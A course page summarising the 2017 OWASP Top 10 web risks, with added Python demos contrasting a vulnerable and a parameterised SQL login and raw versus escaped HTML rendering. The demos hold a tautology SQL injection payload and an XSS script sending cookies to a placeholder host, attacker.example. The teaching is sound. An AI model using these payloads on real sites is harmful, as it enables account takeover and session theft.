The OWASP top 10
Understanding the common threats to our systems and applications helps us to identify elements that are likely to have flaws.
Important
These lists are meant for guidance. They tell us where flaws are commonly found and give some idea of the associated risk, but focusing only on the items in a list means that other security issues may be missed.
One such list is the OWASP Top 10 web application security risks.
The OWASP Foundation has been compiling a list of what it classes as the most
prevalent web vulnerabilities since 2004.
The list is compiled by a panel of industry experts, based on analysis of
existing applications and known vulnerabilities.
The 2017 version (the current one when this page was written) looked at over 50,000 applications and 2.3 million vulnerabilities. These are categorised and ranked according to the risk they pose.
Each category is rated on:
- Exploitability (how easy it is to exploit)
- Weakness Prevalence (how common it is)
- Weakness Detectability (how easy it is to find)
- Technical Impact (what a successful exploit lets the attacker do; the business impact is treated as application specific)
Note
The numbering scheme may make it look like a list of the most common attacks. However, the ranking reflects the risk associated with each type of weakness.
It is interesting to note that the likelihood of a given application actually being attacked (the threat agents it faces) is not factored into the rating; that, too, is treated as application specific.
Looking at the OWASP top 10
In this section we will take a brief look at the top 10. You can find a more detailed report in the OWASP Top 10 document.
- Injection:
Including SQL, NoSQL, OS command and LDAP injection. This happens when untrusted data is sent to an interpreter as part of a command or query, so that the data is treated as part of the command itself.
This may allow the attacker to execute commands on the server, or read and modify data they should not be able to access.
- Broken Authentication:
Functions related to authentication and session handling are not implemented correctly.
This can allow an attacker to compromise passwords or session tokens and assume other users' identities.
- Sensitive Data Exposure:
Where the web application does not adequately protect sensitive information such as credentials, financial or health data. For example, returning another user's data in response to a modified request. Other risks include not encrypting data when it is stored or transmitted across the network, or using weak algorithms and key management.
- XML External Entities (XXE):
Older or poorly configured XML parsers resolve references to external entities inside an XML document. An attacker who can supply XML can use this to read files on the server, make the server request internal URLs, or cause a denial of service; in some environments it can lead to code execution.
- Broken Access Control:
Where restrictions on what users may do are not properly enforced. This means that an attacker can access files, data or functions that their privileges should deny, for example by changing an identifier in a URL.
- Security Misconfiguration:
Where insecure site, framework or library configurations are used. This may be the result of insecure default configs, leaving unnecessary features or debug options turned on, verbose error messages, or mistakes in the config settings.
- Cross Site Scripting (XSS):
XSS attacks are where untrusted user-supplied data is included in a web page without proper validation or escaping. This can allow an attacker to execute scripts in the victim's browser, for example to hijack their session or deface the page.
- Insecure Deserialization:
Where components that accept and reconstruct objects from user-supplied data (such as serialised session objects or JSON/XML documents) trust that data. This commonly leads to remote code execution on the server, but can also be used for injection, privilege escalation or replay attacks.
- Using Components with Known Vulnerabilities:
Libraries, frameworks and APIs with known vulnerabilities run with the same privileges as the application, so a flaw in one of them can lead to any of the above attacks. This becomes more important when we realise that new vulnerabilities can be discovered in components after we choose to use them, so dependencies need to be tracked and updated.
- Insufficient Logging and Monitoring:
While this may not directly lead to the application being compromised, it means that attacks are not detected or responded to in time. We saw in week 3 that audit is vital to understanding and responding to attacks.
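As an added example that is not part of the original page, the Injection item above in runnable form: a login check that splices user input into SQL, beside the parameterised version. The in-memory SQLite table, its two users and the attacker's input are constructed for the demo.

```python
import sqlite3

# Constructed sample accounts for the demo (not from the page).
USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory database with a users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """Return the names matched by a query built with string formatting.

    Untrusted input becomes part of the SQL text, so quotes in the
    input change the structure of the query, not just the values compared.
    """
    sql = (
        "SELECT name FROM users "
        f"WHERE name = '{name}' AND password = '{password}' ORDER BY name"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, name, password):
    """Return the names matched by a parameterised query.

    The driver sends the values separately from the statement, so a
    quote in the input is compared as data rather than parsed as SQL.
    """
    sql = "SELECT name FROM users WHERE name = ? AND password = ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, (name, password))]


def demo():
    """Run an honest login and an injection attempt against both versions."""
    conn = make_db()
    # Classic tautology payload: closes the password literal and appends
    # OR '1'='1, which is true for every row.
    payload = "' OR '1'='1"
    return {
        "honest_vuln": login_vulnerable(conn, "alice", "s3cret"),
        "honest_safe": login_safe(conn, "alice", "s3cret"),
        "attack_vuln": login_vulnerable(conn, "nobody", payload),
        "attack_safe": login_safe(conn, "nobody", payload),
    }


if __name__ == "__main__":
    for label, names in demo().items():
        print(f"{label}: {names}")
```

With the payload, the vulnerable query becomes `... WHERE name = 'nobody' AND password = '' OR '1'='1' ...`; because AND binds tighter than OR, the condition is true for every row and both users are "logged in". The parameterised query compares the whole payload string against the password column and matches nothing.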
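Likewise for the Cross Site Scripting item: an added example, not from the original page, showing a comment rendered into a page with and without output encoding. The page template and the attacker's comment are constructed for the demo; `attacker.example` is a placeholder host.

```python
import html

# Constructed attacker-supplied comment (not from the page): a script
# that would send the visitor's cookies to a host the attacker controls.
COMMENT = (
    '<script>document.location="http://attacker.example/?c="'
    "+document.cookie</script>"
)

# Minimal page template; the comment is inserted at the placeholder.
PAGE = "<html><body><p>Comment: {}</p></body></html>"


def render_vulnerable(comment):
    """Paste the untrusted string straight into the HTML.

    Any tags in the comment are interpreted by the browser as part of
    the page, so the script runs for every visitor who views it.
    """
    return PAGE.format(comment)


def render_safe(comment):
    """Encode the untrusted string for an HTML text context.

    html.escape turns <, >, &, " and ' into entities, so the browser
    displays the comment as text instead of executing it.
    """
    return PAGE.format(html.escape(comment, quote=True))


def contains_script_tag(rendered):
    """Crude check used by the demo: is a live <script> element present?"""
    return "<script>" in rendered.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(COMMENT))
    print("safe:      ", render_safe(COMMENT))
```

Escaping is context dependent: `html.escape` is correct for text between tags and for quoted attribute values, but data placed inside a `<script>` block, a URL or a CSS rule needs the encoding for that context, which is why templating engines that escape by default are preferred over manual string building.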
Script Kiddies #ScriptKiddies
Several of these vulnerabilities have been in the list since the first release of the OWASP Top 10. Others (such as SQLi) are well known issues, and easily exploitable using tools downloaded from the web.
- Are there any of the Top 10 that surprise you?
- Why do you think that well known vulnerabilities are still in the top 10?
Post in the Feed on Aula using the tag #ScriptKiddies
OWASP top 10 #OWASP
Pick one of the OWASP top 10, and research it in more detail.
- How does this issue occur?
- Give a real-world example of this issue.
Post in the Feed on Aula using the tag #OWASP